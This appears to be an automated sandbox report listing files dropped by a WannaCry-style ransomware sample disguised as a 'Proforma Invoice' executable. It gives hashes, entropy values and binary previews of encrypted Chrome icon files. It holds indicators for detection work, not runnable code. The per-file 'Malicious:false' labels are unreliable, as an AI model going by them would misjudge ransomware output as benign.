                                                          SHA-256:D8598D12088FB0C4AC41D3F0D2BA253CFCE9679034CFAD7CF094028A7676478A
                                                          SHA-512:72C8AB89E99B784128B25B3FAD460CD1088B258F731A38EDFEAE0D79372D6589F2F31662B9192CBD1AC2D924139F554EB765C43F3E19A9D60CCC2DF3E875F5C5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Qp!..b.;:.z@.w.........-.=6.m !..MMh<........X..kR,....}......A../.u..?.X..zK#ew..]{.2=}...v........P?.-M....]..d0C...N.@.9C4#.p.8...!'.On..'.Z; .W...I.pN...........\.......s...........&.d@.^.]z..P.>.^x.Z.;......MM\.u....f.z.&..G...,g.._k.J............Y....S.x...^;......,...=..>=.DgoF.....t.EdkIp.V..8.8..z..!}...R.P...KrwBsUo.3.....DZ....j.7..i..C..s..)".C7..:.M1:`...+.e..n...>..(CM..{....u@O.U.X.Q......u.'G.m..%.W...@...p..fK.B..U.P.H..M.UR.h.{.......W.....<y.'...lX..t@...Tx.w`.../L.u.m..s...|t...E<A.m.D'.!)...w.I.TDs.L..m.q....p..}..\\*..Nxw..\./...5...B.1{...g^..".;..Z.d..d.....`$pO<..c.$...^=x............~ .D..7....$.f.l%.....[.ld-x_.f2..."..B.`M$w.....E?#..../...f,.'.Ou...*<.Lg....hU.b*.,....R..4j?...:......x.D)^..?..........&9IsYK.....hk.<....~`.$dD....kA].X8n.....F@..E.6..U.v.EHv.).a..<.S.2.p)`.o{...h.....:i`/..tH...G~.)........r%^..Lf.2.r....AV..W.0....@...k.Z..ip.;.#^x.Ca......S2...l.....ge.g2N,.1.;/'$...J....W....1..B.&.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\192.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1496
                                                          Entropy (8bit):7.861262427769727
                                                          Encrypted:false
                                                          SSDEEP:24:bkv8xFtrshRhoBr1XRamtSjXLaqcdLxL0QKyKpm+B7jVCTJ20zSshm14G8jLqA:bkGYhHChRtSjGFLx4Q5+BvkTnzpEatyA
                                                          MD5:8ECADC41F36F91E232FA2E2F3C2D1DAD
                                                          SHA1:26621E8BD125F716058748A702F69C20B6A40F90
                                                          SHA-256:D8598D12088FB0C4AC41D3F0D2BA253CFCE9679034CFAD7CF094028A7676478A
                                                          SHA-512:72C8AB89E99B784128B25B3FAD460CD1088B258F731A38EDFEAE0D79372D6589F2F31662B9192CBD1AC2D924139F554EB765C43F3E19A9D60CCC2DF3E875F5C5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Qp!..b.;:.z@.w.........-.=6.m !..MMh<........X..kR,....}......A../.u..?.X..zK#ew..]{.2=}...v........P?.-M....]..d0C...N.@.9C4#.p.8...!'.On..'.Z; .W...I.pN...........\.......s...........&.d@.^.]z..P.>.^x.Z.;......MM\.u....f.z.&..G...,g.._k.J............Y....S.x...^;......,...=..>=.DgoF.....t.EdkIp.V..8.8..z..!}...R.P...KrwBsUo.3.....DZ....j.7..i..C..s..)".C7..:.M1:`...+.e..n...>..(CM..{....u@O.U.X.Q......u.'G.m..%.W...@...p..fK.B..U.P.H..M.UR.h.{.......W.....<y.'...lX..t@...Tx.w`.../L.u.m..s...|t...E<A.m.D'.!)...w.I.TDs.L..m.q....p..}..\\*..Nxw..\./...5...B.1{...g^..".;..Z.d..d.....`$pO<..c.$...^=x............~ .D..7....$.f.l%.....[.ld-x_.f2..."..B.`M$w.....E?#..../...f,.'.Ou...*<.Lg....hU.b*.,....R..4j?...:......x.D)^..?..........&9IsYK.....hk.<....~`.$dD....kA].X8n.....F@..E.6..U.v.EHv.).a..<.S.2.p)`.o{...h.....:i`/..tH...G~.)........r%^..Lf.2.r....AV..W.0....@...k.Z..ip.;.#^x.Ca......S2...l.....ge.g2N,.1.;/'$...J....W....1..B.&.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4328
                                                          Entropy (8bit):7.949329636629746
                                                          Encrypted:false
                                                          SSDEEP:96:oo4MQ1tIYbQGJ7OL4e/oi4sO8gl9G2EZCAlyza7gS2L:jzAtIY0aC+sOdl9ulkat2L
                                                          MD5:4D6139B23AB649375A93DADCFFCA0786
                                                          SHA1:D1B90C0942C212C97F80CC357DDBEB0AF1D99A88
                                                          SHA-256:0D235FF7401C9B932991154C04A2240501035E9B20E5CB83729AC57425397CC7
                                                          SHA-512:95A7779474CC8E19E75A9FA16F410FE2DCFF29296DFD50E0D8BA2F1C85D6B8A39907D5693358624AC9DC813AACE009B7A02C9B2719A3908C1C62AE07F5EE7A59
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....RXd./..<.%p).k'.CU..@..R..B.m._k.h..f7..A)...O.h%Z?.P..!.mJ..wkL.8.H.P?.......7.Y..>3..(m._n...317r?..e...._..;4.$..}\..@7...|..Z.l%)\.._...{E.&...kgF..Rfr..D.........mx.^cx..QC....p.9..#1I ..}$Y..q..X...X..Q#.%..$..@.?f.L.EDxh..z.S..U....@.@a.a...............<L.w.#C@....D..DEG..@.f...Zg..SJ...'>S....5..>....5.*B<..$n..UqS....Y_.....3>VL...b..#.q1.M..(...<../?...dU..]Ox<..V\.......lY.n.w.B..].P!3...D..p.K...5..XN_r.g...I.x....(...8.....i...Q."DJ.m..XS..*..._k.-j.......4...R..Q._...c.....3..<GR......M.{y......|.Li.....F=...a.Y.b...5&.z..1K....xb.V.......u.7<E..#.....5fiO6.lO......d..../.."T.....1.@...*..5O..k....6.7.G.....`d..yR.f.~SA.;!T.@T....-v~L:..w...zj=DD....%.H..?(S.p......Y.wj.Q.......`y...*..t...c.t..H.ui.F...&z.^.7.u..DP.Ef......._...O?=.*...y...`y$...6T..e...vE.-...!..c....y.........B....YK@.E.%.{x2....'..7..$.o....T..W.#\.;.). ...@..v.-.B.&.D.U..Z2.cNJ........&.Md.Im{.p."...a..[%.SfM..}.*..7......Ib....._YK.ra...........`..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\256.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4328
                                                          Entropy (8bit):7.949329636629746
                                                          Encrypted:false
                                                          SSDEEP:96:oo4MQ1tIYbQGJ7OL4e/oi4sO8gl9G2EZCAlyza7gS2L:jzAtIY0aC+sOdl9ulkat2L
                                                          MD5:4D6139B23AB649375A93DADCFFCA0786
                                                          SHA1:D1B90C0942C212C97F80CC357DDBEB0AF1D99A88
                                                          SHA-256:0D235FF7401C9B932991154C04A2240501035E9B20E5CB83729AC57425397CC7
                                                          SHA-512:95A7779474CC8E19E75A9FA16F410FE2DCFF29296DFD50E0D8BA2F1C85D6B8A39907D5693358624AC9DC813AACE009B7A02C9B2719A3908C1C62AE07F5EE7A59
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....RXd./..<.%p).k'.CU..@..R..B.m._k.h..f7..A)...O.h%Z?.P..!.mJ..wkL.8.H.P?.......7.Y..>3..(m._n...317r?..e...._..;4.$..}\..@7...|..Z.l%)\.._...{E.&...kgF..Rfr..D.........mx.^cx..QC....p.9..#1I ..}$Y..q..X...X..Q#.%..$..@.?f.L.EDxh..z.S..U....@.@a.a...............<L.w.#C@....D..DEG..@.f...Zg..SJ...'>S....5..>....5.*B<..$n..UqS....Y_.....3>VL...b..#.q1.M..(...<../?...dU..]Ox<..V\.......lY.n.w.B..].P!3...D..p.K...5..XN_r.g...I.x....(...8.....i...Q."DJ.m..XS..*..._k.-j.......4...R..Q._...c.....3..<GR......M.{y......|.Li.....F=...a.Y.b...5&.z..1K....xb.V.......u.7<E..#.....5fiO6.lO......d..../.."T.....1.@...*..5O..k....6.7.G.....`d..yR.f.~SA.;!T.@T....-v~L:..w...zj=DD....%.H..?(S.p......Y.wj.Q.......`y...*..t...c.t..H.ui.F...&z.^.7.u..DP.Ef......._...O?=.*...y...`y$...6T..e...vE.-...!..c....y.........B....YK@.E.%.{x2....'..7..$.o....T..W.#\.;.). ...@..v.-.B.&.D.U..Z2.cNJ........&.Md.Im{.p."...a..[%.SfM..}.*..7......Ib....._YK.ra...........`..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1176
                                                          Entropy (8bit):7.822363118738531
                                                          Encrypted:false
                                                          SSDEEP:24:bkADtwzs0lEfaltk7VmG1bjczO2b1jJbaRzsOiPvmy2Fk4Qx:bkZzookp1UzO2JNb5O8d2FOx
                                                          MD5:C8794C02C10788F138D27F98C18E5860
                                                          SHA1:E8A6735359F5B68CCD7A2E06D5236907346BCB43
                                                          SHA-256:FEDC25ADD45FFDBB7721C830FCAD8CAB0EBE94E528AEE80DF5BFACD0E41DF644
                                                          SHA-512:10ED46D41687AB31B6FEDC45F3ED96A1671B9EBFF7BAA7CF98FA8C15DA0CC36A869598AEAFEB5B2988619D7EEFEA0DA730C0CAE62669A65A1FAF68FF93460AC6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........=.S.-.8e.$b........:...-ppC..Y...D@.....)].YR..R..!.4.#.2.qU.)..?.8m.I......9..8.E..).~G.......H|.D&...=.Z5....H....:...9........w...G.R.s.........`...g.s.">..3S....f.F...).D..y. bK.So..W......L>,"...z..#..2.E.........,.H...C.i%.&....L!.....z.......R-...Jc......_N.*Z./0.N8....t....h.'5"...N.J.....>.!.|.E.T.=.Xs^5....M.W..X...?N..3....<.T...fw./Xw..#k.......h......2{~+....g.z.+.'........4..A.2e...T.%..Q..I...h..d....q../.n.v.t.a.oD..Y.)..Iv....+..o......mYX..D..7{O.f.DH.........u..I.w..p-..*....=..i.....fI....99c..fc..>....[..=....t.-9./V..5..@c.esp..x..Dh.l:V.v...|.2....l9d.Y.i..UQ..T...p/.4..)[f.P.....2*2..P......Z...Y.....v......i......0....i../u|.Q..aD..*ehNqT...,...`.Ixa.....`(.F..nQ[B..k.......i......Wq..gA..;.+....,...cG.......exc.(-...ZT....."...q..A^g('.... K.>.8.|.<..D.;...!1..#..K........M...........E...x.....=...l.X......m,@..z$..nl-'.....9.hG...p..y.y.@.......[$Ar.,..*."k.[..WS.D+.r@.&)}....PM....[....

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\32.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1176
                                                          Entropy (8bit):7.822363118738531
                                                          Encrypted:false
                                                          SSDEEP:24:bkADtwzs0lEfaltk7VmG1bjczO2b1jJbaRzsOiPvmy2Fk4Qx:bkZzookp1UzO2JNb5O8d2FOx
                                                          MD5:C8794C02C10788F138D27F98C18E5860
                                                          SHA1:E8A6735359F5B68CCD7A2E06D5236907346BCB43
                                                          SHA-256:FEDC25ADD45FFDBB7721C830FCAD8CAB0EBE94E528AEE80DF5BFACD0E41DF644
                                                          SHA-512:10ED46D41687AB31B6FEDC45F3ED96A1671B9EBFF7BAA7CF98FA8C15DA0CC36A869598AEAFEB5B2988619D7EEFEA0DA730C0CAE62669A65A1FAF68FF93460AC6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........=.S.-.8e.$b........:...-ppC..Y...D@.....)].YR..R..!.4.#.2.qU.)..?.8m.I......9..8.E..).~G.......H|.D&...=.Z5....H....:...9........w...G.R.s.........`...g.s.">..3S....f.F...).D..y. bK.So..W......L>,"...z..#..2.E.........,.H...C.i%.&....L!.....z.......R-...Jc......_N.*Z./0.N8....t....h.'5"...N.J.....>.!.|.E.T.=.Xs^5....M.W..X...?N..3....<.T...fw./Xw..#k.......h......2{~+....g.z.+.'........4..A.2e...T.%..Q..I...h..d....q../.n.v.t.a.oD..Y.)..Iv....+..o......mYX..D..7{O.f.DH.........u..I.w..p-..*....=..i.....fI....99c..fc..>....[..=....t.-9./V..5..@c.esp..x..Dh.l:V.v...|.2....l9d.Y.i..UQ..T...p/.4..)[f.P.....2*2..P......Z...Y.....v......i......0....i../u|.Q..aD..*ehNqT...,...`.Ixa.....`(.F..nQ[B..k.......i......Wq..gA..;.+....,...cG.......exc.(-...ZT....."...q..A^g('.... K.>.8.|.<..D.;...!1..#..K........M...........E...x.....=...l.X......m,@..z$..nl-'.....9.hG...p..y.y.@.......[$Ar.,..*."k.[..WS.D+.r@.&)}....PM....[....

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1432
                                                          Entropy (8bit):7.850367942896185
                                                          Encrypted:false
                                                          SSDEEP:24:bk+4NVo1M22oW47kVdG4i8j4SOtssEpBr7gDW6i11J5mgiZLw1Qj:bkRNVoOh4gVdG2jZQCph6CYNj
                                                          MD5:8FBCC4E1756180F15105D42B139B07C9
                                                          SHA1:55FC5E43A6460889CB87D82D3B1F137CBA54E67E
                                                          SHA-256:9E93148DE5FEC544B95097747C50CA01C9DFF105651B684AB77480FB44AD7921
                                                          SHA-512:AFF501C616744C7568F15BC6AB0E3D257688ED2D2E206A40E99E6E4CED92F3661B7E44D9FB233002E01322C01A8CAECE240F4E7B277DF771D597D81D692E0F65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........q.!....x.R.......f.JN.Y.7bp<...^.. ....!..k.P..`h-.......=...6.Y.d..m.J.Z/|..?u.].0J.X.a..{..,b...............g1...N.6S.<D...yv..].g..Q.<*Ug....Y".|.N<M..]>,.p.....B9..~....gS....C.{.f..X..}...XZ]x..NKt...>..j.b........D.0..J...-....|..........Mv2$..'.|........@.u...'.l.{.~.........5YY.?*...d.W..`.s.$..x>?........29Z.G...J.?S..a.;...U6..dc....#^,x.j.....i2..L.\.#-.R..3.Y.ix...B/\V.!p.%..v..^^..y.....u.t.`+.~....,.B..1....K1.t........|f.5.~..v.l[.}D6.j...S..47...A.49vE.{.0.I......C$...]..U}..SX..?`..a.H_.P".?.s?`@.lx......S.....&w.p....f*.u>fH.S9QJ~...A.BV....e.O..f!.G...6..Hv.ifY..>...v...0...A...........7Q!u.'u.oW..........n..e.-.;y...ftS....#._c./2..B..u..Z.<...A...{..j.^..v..t...\.[Tx...h1f..=/.....Q....\..q..R{....A.z.Ce.,b......,...-^.o..->r8).AF....Q...m.0.34%Iw...k.....Z.<:..{d.E..B...f.[Ao. x..tx..Fg.6G....gBo..R..?[......."...6..m.8n....RU[..b...O.V3.._.U...u.v..x...Xw...B.I.|Ik...He..S.d.Y.;?.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\48.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1432
                                                          Entropy (8bit):7.850367942896185
                                                          Encrypted:false
                                                          SSDEEP:24:bk+4NVo1M22oW47kVdG4i8j4SOtssEpBr7gDW6i11J5mgiZLw1Qj:bkRNVoOh4gVdG2jZQCph6CYNj
                                                          MD5:8FBCC4E1756180F15105D42B139B07C9
                                                          SHA1:55FC5E43A6460889CB87D82D3B1F137CBA54E67E
                                                          SHA-256:9E93148DE5FEC544B95097747C50CA01C9DFF105651B684AB77480FB44AD7921
                                                          SHA-512:AFF501C616744C7568F15BC6AB0E3D257688ED2D2E206A40E99E6E4CED92F3661B7E44D9FB233002E01322C01A8CAECE240F4E7B277DF771D597D81D692E0F65
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.........q.!....x.R.......f.JN.Y.7bp<...^.. ....!..k.P..`h-.......=...6.Y.d..m.J.Z/|..?u.].0J.X.a..{..,b...............g1...N.6S.<D...yv..].g..Q.<*Ug....Y".|.N<M..]>,.p.....B9..~....gS....C.{.f..X..}...XZ]x..NKt...>..j.b........D.0..J...-....|..........Mv2$..'.|........@.u...'.l.{.~.........5YY.?*...d.W..`.s.$..x>?........29Z.G...J.?S..a.;...U6..dc....#^,x.j.....i2..L.\.#-.R..3.Y.ix...B/\V.!p.%..v..^^..y.....u.t.`+.~....,.B..1....K1.t........|f.5.~..v.l[.}D6.j...S..47...A.49vE.{.0.I......C$...]..U}..SX..?`..a.H_.P".?.s?`@.lx......S.....&w.p....f*.u>fH.S9QJ~...A.BV....e.O..f!.G...6..Hv.ifY..>...v...0...A...........7Q!u.'u.oW..........n..e.-.;y...ftS....#._c./2..B..u..Z.<...A...{..j.^..v..t...\.[Tx...h1f..=/.....Q....\..q..R{....A.z.Ce.,b......,...-^.o..->r8).AF....Q...m.0.34%Iw...k.....Z.<:..{d.E..B...f.[Ao. x..tx..Fg.6G....gBo..R..?[......."...6..m.8n....RU[..b...O.V3.._.U...u.v..x...Xw...B.I.|Ik...He..S.d.Y.;?.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1592
                                                          Entropy (8bit):7.87589320722404
                                                          Encrypted:false
                                                          SSDEEP:48:bk+nVOakmv47Y9qspQJ7C55w33D+OeVqweCzKxo:owVxkmg7Y9gJuA3D+Oevmxo
                                                          MD5:44A5226737FA6C3F162A384030AE58A4
                                                          SHA1:ADED4FCBB15DB30FF94C211EE02A3E76AD15C0EE
                                                          SHA-256:63DC6E433F2AE87D9CE320380FC4EB9C028B556105BCAB4EFFC72E87634682A7
                                                          SHA-512:589BA7255F6FC5B848949C6A54610259D6BBEBD328B494A85AA4E0154CE8C00386CC1A5BFCED92A90C11046E3EBC0ACB447437A65D697C38FD7D3CEACDCBE32F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......V.v.f....m.D.6..4..$...W..gw.......3%B.....+|...V..EeY..|.3......k...:!...vE`......;.^.;...[f...m...;.*6..qW.V*..y.}....y.z+.mr..n.Q.x".*Ix..[..|.......>.yP...:.....h.C..K]...6.|]!d5]v.s.+..'Lw..I...n.....!.$.^.$4x..j>..t.f...wZV......$}..N8..H9............l........c'f../.Z$..q..9..?.....e|*v...?G.........L...h.. ..5.<!*...".".p.........nV...d.....V....8....i..Z..)..#.$.p...h.....8.9..#..@.3.....(......~.-.....K..m.L.d..U.1).g........J...\r.@.*..,.wZ.......m...pU.u{.*.!U......=z..3K....?.\[_....`....>.....n1...x5.`....N.zx.T....e...]........!..^.;v;...9m..x.=E..w.<..m......pd]?..>&.....S..D1...~,............k.T->..y...P..W..).+q.%#o@{.&...z.tJ>R5F...J.<..[j.'.._..6.-v...R,.......'.m#...Q.4...!.e..n....v.x...|*cX.!.4.5..!..r.f..dn...&...P...m..6...1.....E.Z.L.lW....d\=.p...:.A"r>d&h.@.=ac.q...dB:b....f+'j|.{.s6(>R..#.W....7..1".G.\r;x..y....NE..{DA...K[jJ..as...".......L...P.!..E.i.*C.+.zI....XT.(....z..m`..wy.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\64.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1592
                                                          Entropy (8bit):7.87589320722404
                                                          Encrypted:false
                                                          SSDEEP:48:bk+nVOakmv47Y9qspQJ7C55w33D+OeVqweCzKxo:owVxkmg7Y9gJuA3D+Oevmxo
                                                          MD5:44A5226737FA6C3F162A384030AE58A4
                                                          SHA1:ADED4FCBB15DB30FF94C211EE02A3E76AD15C0EE
                                                          SHA-256:63DC6E433F2AE87D9CE320380FC4EB9C028B556105BCAB4EFFC72E87634682A7
                                                          SHA-512:589BA7255F6FC5B848949C6A54610259D6BBEBD328B494A85AA4E0154CE8C00386CC1A5BFCED92A90C11046E3EBC0ACB447437A65D697C38FD7D3CEACDCBE32F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......V.v.f....m.D.6..4..$...W..gw.......3%B.....+|...V..EeY..|.3......k...:!...vE`......;.^.;...[f...m...;.*6..qW.V*..y.}....y.z+.mr..n.Q.x".*Ix..[..|.......>.yP...:.....h.C..K]...6.|]!d5]v.s.+..'Lw..I...n.....!.$.^.$4x..j>..t.f...wZV......$}..N8..H9............l........c'f../.Z$..q..9..?.....e|*v...?G.........L...h.. ..5.<!*...".".p.........nV...d.....V....8....i..Z..)..#.$.p...h.....8.9..#..@.3.....(......~.-.....K..m.L.d..U.1).g........J...\r.@.*..,.wZ.......m...pU.u{.*.!U......=z..3K....?.\[_....`....>.....n1...x5.`....N.zx.T....e...]........!..^.;v;...9m..x.=E..w.<..m......pd]?..>&.....S..D1...~,............k.T->..y...P..W..).+q.%#o@{.&...z.tJ>R5F...J.<..[j.'.._..6.-v...R,.......'.m#...Q.4...!.e..n....v.x...|*cX.!.4.5..!..r.f..dn...&...P...m..6...1.....E.Z.L.lW....d\=.p...:.A"r>d&h.@.=ac.q...dB:b....f+'j|.{.s6(>R..#.W....7..1".G.\r;x..y....NE..{DA...K[jJ..as...".......L...P.!..E.i.*C.+.zI....XT.(....z..m`..wy.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1800
                                                          Entropy (8bit):7.88846803252821
                                                          Encrypted:false
                                                          SSDEEP:48:bk4traZhLI9MXFrgSiFknXNvPibzME38DGK1/:o4traZhLzdgSmzyB1/
                                                          MD5:0FE707A204593CE7EFFC4D3D87EC95C3
                                                          SHA1:EC78FE15E69439AD63C82594DB5F7D3ACA389BEA
                                                          SHA-256:AEE040B9873716FC38EB8C3DA4385FB050A0D6468CBDD0E5C03EE3AA1A5E80B5
                                                          SHA-512:83FDD24CA4D49EF451352BD7CD82629FAE8EA146B31FE827E32BA78EB010B7D1F578DABB01F97824C5B40965DDF65C2F85B78F4689652FBE61C2BF1AD961E0D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......D.*.~.m^.>..h.S..s.!.t!..E..[7.+.3.Lxt0....`~.D....i.&...S...8..0.+..C=7.a...?.....w....I>>..../..?.......w.#_#L.[.RTB.C..u.r../..R...u9.=...q............t..t$.._.-....j\.=.....(.l. ...>........./.=.z..R.B..A.A%...:.R.I.\c..h~.....-.D.R.u=.............^0..V...}.0M..B...i@..Q..^+.w...}..W....1.F6..$..B?.._.R...,.Q.DR.7$`\..zT.....d...'.....l-f......7..yaWI......+.._K&;..D...,.p....B..D.J>.O:a."........{.\...."5.^.K..f_>.).....S<]f.pT.>.M...2..I|e.e.$....V.l..&t..^6.q.r....n.3..rtl.\&_Ar.*_.$...D...0.......4....#.\...y3..-'./...M......l._.... f$H.et....0..(..".BY.T.........O.....Mo..x...J..O..p..ss.........!.........(.c..=.=.v=.....8.K...X.r......$...*...+....4.).<.S..(<.....6#.lk.J....I.U>\K.}..Y..i.fP.]..Iw......W;...B..4.?..1..;.KEZ...Z..G,:Fy!....V.(..1.<\......L....*.:..)Z.e3.........<.....6.I....6.X.....#j.....^.....-..k...PS....Y.Q. +.l..U*..80.gY.#.%.....ir..j.~.._*....]......V.L%Fj..21X/....n...6.r.zbx....T ..XIn.I......%.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\96.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1800
                                                          Entropy (8bit):7.88846803252821
                                                          Encrypted:false
                                                          SSDEEP:48:bk4traZhLI9MXFrgSiFknXNvPibzME38DGK1/:o4traZhLzdgSmzyB1/
                                                          MD5:0FE707A204593CE7EFFC4D3D87EC95C3
                                                          SHA1:EC78FE15E69439AD63C82594DB5F7D3ACA389BEA
                                                          SHA-256:AEE040B9873716FC38EB8C3DA4385FB050A0D6468CBDD0E5C03EE3AA1A5E80B5
                                                          SHA-512:83FDD24CA4D49EF451352BD7CD82629FAE8EA146B31FE827E32BA78EB010B7D1F578DABB01F97824C5B40965DDF65C2F85B78F4689652FBE61C2BF1AD961E0D7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......D.*.~.m^.>..h.S..s.!.t!..E..[7.+.3.Lxt0....`~.D....i.&...S...8..0.+..C=7.a...?.....w....I>>..../..?.......w.#_#L.[.RTB.C..u.r../..R...u9.=...q............t..t$.._.-....j\.=.....(.l. ...>........./.=.z..R.B..A.A%...:.R.I.\c..h~.....-.D.R.u=.............^0..V...}.0M..B...i@..Q..^+.w...}..W....1.F6..$..B?.._.R...,.Q.DR.7$`\..zT.....d...'.....l-f......7..yaWI......+.._K&;..D...,.p....B..D.J>.O:a."........{.\...."5.^.K..f_>.).....S<]f.pT.>.M...2..I|e.e.$....V.l..&t..^6.q.r....n.3..rtl.\&_Ar.*_.$...D...0.......4....#.\...y3..-'./...M......l._.... f$H.et....0..(..".BY.T.........O.....Mo..x...J..O..p..ss.........!.........(.c..=.=.v=.....8.K...X.r......$...*...+....4.).<.S..(<.....6#.lk.J....I.U>\K.}..Y..i.fP.]..Iw......W;...B..4.?..1..;.KEZ...Z..G,:Fy!....V.(..1.<\......L....*.:..)Z.e3.........<.....6.I....6.X.....#j.....^.....-..k...PS....Y.Q. +.l..U*..80.gY.#.%.....ir..j.~.._*....]......V.L%Fj..21X/....n...6.r.zbx....T ..XIn.I......%.

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2296
                                                          Entropy (8bit):7.925234697817188
                                                          Encrypted:false
                                                          SSDEEP:48:bkb0NLRb4nOtTbwt45TP7GrxV/Pe/397IQxyTDFBitfQwh0+DfwZe:oeSNEirTPYTWDyfQwh0+5
                                                          MD5:0C90D1F6A26BF720EF901ED1714D5D5B
                                                          SHA1:BEF4CED6C51779361762E413A9DBE88164EF0C2C
                                                          SHA-256:537BAF0AF29FBCA989631F35F6F6EC64CB5D99447F823C6F1B989E7F7393C21A
                                                          SHA-512:59E509608257C2A51753BA88FA4A57A5E691CB71B6A713C49D1AC1329C6465A0967ECE60739A60D3302BC6A547B2BA3079726FA0662E08D095B87E698D777783
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....V..M*sT.c&m........U...H..).|F.....>.:..y...c.u.s.../.......V...<.#.)......P.......E.\.S._]...69 ...F...8......(........>E.I..b.l.N..D.P.w5<;S6..V..}A.q....-..\N...........-..F3~r.ci4.O....~@.....f.f{`D....*...4Z..o..z....:}yo.:e&.z.OK.....fn.>Y.3............7.3......0.......n..I,m......z......`.....:.8s.J.Xt<...<.d.[.....x......S....o..px....O8_9....W..`....!.....fZ.....].tI...Z.Q.I..........>-....A.._.....E/rEr=C...I.M<..y.#.,..-r0#.u.6q....?.X0.V.b\.......{j......o.c...A-6..y...q.xR.m...%.\..S...!lT....3$q....v.h0.).NwZF#.............w...$5.....5{.."(....z..t1..k...S. .Q!...JNtx...E.r3...1...^.x.!."...Nu....i.Dkgu).p...AP.>..Z.>.tH.~v.X....p.%.....<|T./.....M........H#.}.".8U.....P.I-....i|.'8!.&..eL...U.......O.L.(.._?.a..mO.....^.ItY.,.K...).h......N.(..V....R..,m...".@..+..v.....5...q-.@.Q.|....d....w@.E..p...Ra.+...A!..-..0;W}...W....?"...8..Yb@0w...?H4=:..p@.3".D..,4...d.(..t..2'K..>,.\2%#E. ..^jVU.lu..*.L...P9d...i4h>{:k...N<...DV..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\128.png.WNCRYT

                                                          Download File
